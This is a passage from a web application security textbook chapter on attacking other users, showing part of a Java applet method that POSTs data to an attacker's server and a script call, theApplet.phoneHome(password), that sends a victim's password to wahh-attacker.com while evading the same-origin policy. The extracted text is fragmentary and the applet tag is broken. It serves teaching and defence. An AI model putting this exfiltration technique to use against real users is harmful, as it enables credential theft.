Chapter 12  ■ Attacking Other Users

urlConn.getOutputStream ());

dos.writeBytes(data);

dos.flush();

dos.close();

DataInputStream input = new DataInputStream(

urlConn.getInputStream ());

}

catch (Exception e)

{        

return e.getMessage();

}

return “data sent”;

}

This method accepts an arbitrary 

String

as input, and generates a 

POST

request to the attacker’s server, containing this data.

The attacker can cause the victim’s browser to load the applet by inserting

the following HTML before his malicious script:

id=”theApplet”>

The applet can then be invoked from the attacker’s script to issue asynchro-

nous requests, as follows:

theApplet.phoneHome(password);

Despite the various security restrictions imposed by the browser’s same ori-

gin policy, this technique is successful because:

■■

HTML documents may load Java applets from any domain.

■■

The applet is loaded from 

wahh-attacker.com

and only ever communi-

cates back to 

wahh-attacker.com

.

■■

XMLHttpRequest

is only ever used to communicate to 

wahh-app.com

,

from where the attacker’s script was loaded.

■■

Any JavaScript on an HTML page may invoke the public methods of

any applet loaded by the page.

Download 5,76 Mb.

Do'stlaringiz bilan baham: